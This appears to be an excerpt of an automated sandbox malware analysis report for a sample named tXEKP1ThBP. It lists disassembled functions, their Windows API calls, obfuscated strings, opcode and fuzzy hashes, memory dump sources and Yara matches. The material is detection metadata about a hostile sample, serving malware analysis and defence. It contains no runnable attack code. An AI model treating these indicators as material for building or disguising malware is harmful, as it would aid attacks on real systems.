                                                      • String ID: CD^O$_DC[
                                                      • API String ID: 4132704954-3597986494
                                                      • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                      • Instruction ID: c1d2984ad8acc509613708a34065303cb14fc1b040902e1d9f822713c80e3ad4
                                                      • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                      • Instruction Fuzzy Hash: 3001D6B0B002489BC720FF68FD51A5973B4EB14714FD082EAD519572A0DB756545CBC9
                                                      Function 004070B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                        • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                      • __Init_thread_footer.LIBCMT ref: 00407119
                                                        • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                        • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                        • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                      • String ID: DCDO$EDO*
                                                      • API String ID: 2296764815-3480089779
                                                      • Opcode ID: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                      • Instruction ID: 6e88f7cd3849569d85f07cd18ee47690fbb1a730dcdea08f10a2250dba35ba50
                                                      • Opcode Fuzzy Hash: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                      • Instruction Fuzzy Hash: 1F0186B0F01208AFC710DF55E98255DB7B0E705304F90457ADA15AB3D1DB386D95CB8D
                                                      Function 004071C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                        • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                      • __Init_thread_footer.LIBCMT ref: 00407229
                                                        • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                        • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                        • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                      • String ID: DCDO$^]E*
                                                      • API String ID: 2296764815-2708296792
                                                      • Opcode ID: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                      • Instruction ID: 8efc7060af64cb8acb1af25de2c4b339d239c6825e953d18f5e204f1a235d67b
                                                      • Opcode Fuzzy Hash: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                      • Instruction Fuzzy Hash: 8F016D70F002089BC720EF68E94295DB7B0EB08304F9441BEE919A7396DB3969158BCE
                                                      Function 04CC64B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 04CC6519
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: DCDO$EDO*
                                                      • API String ID: 1385522511-3480089779
                                                      • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                      • Instruction ID: 6b8ca56793d977c6a2290d66392b4194c3560b7b10effc4ea746eaa1eaba52ba
                                                      • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                      • Instruction Fuzzy Hash: 230186B0F012089FD720EFA4E98155DB7B1E705304F90457DDA1597350DB347A859B99
                                                      Function 04CC65C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 04CC6629
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: DCDO$^]E*
                                                      • API String ID: 1385522511-2708296792
                                                      • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                      • Instruction ID: d6c73def64b241fde33686bb6f619afabaf776c9a9678f98979ca2845030e549
                                                      • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                      • Instruction Fuzzy Hash: AB018170F00208AFD720FF68E94256DBBB1EB04304F94417ED91997394DF357A159B99
                                                      Function 04B17427 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04B193D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B193E2
                                                        • Part of subcall function 04B193D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B1941F
                                                      • __Init_thread_footer.LIBCMT ref: 04B17490
                                                        • Part of subcall function 04B1938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B19397
                                                        • Part of subcall function 04B1938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B193CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                      • String ID: DCDO$^]E*
                                                      • API String ID: 4132704954-2708296792
                                                      • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                      • Instruction ID: b3b1732112f20a57df7db66b0827bef03ae2011238619e3fbf0c166fb11b18cf
                                                      • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                      • Instruction Fuzzy Hash: 1F01ADB0B40248EBD720EF68E99255CBBB0EB08304F9401BAC919973A4CB35B910CB99
                                                      Function 04B17317 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04B193D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B193E2
                                                        • Part of subcall function 04B193D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B1941F
                                                      • __Init_thread_footer.LIBCMT ref: 04B17380
                                                        • Part of subcall function 04B1938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B19397
                                                        • Part of subcall function 04B1938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B193CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                      • String ID: DCDO$EDO*
                                                      • API String ID: 4132704954-3480089779
                                                      • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                      • Instruction ID: 296272d948636eb8b296ad61b13349bab8ccdc1010552641eb7e4383b2c44378
                                                      • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                      • Instruction Fuzzy Hash: 30014BB0B412489BD710DF68E99169CB7A0EB05714FE041BADA16973A0DB34B985CB89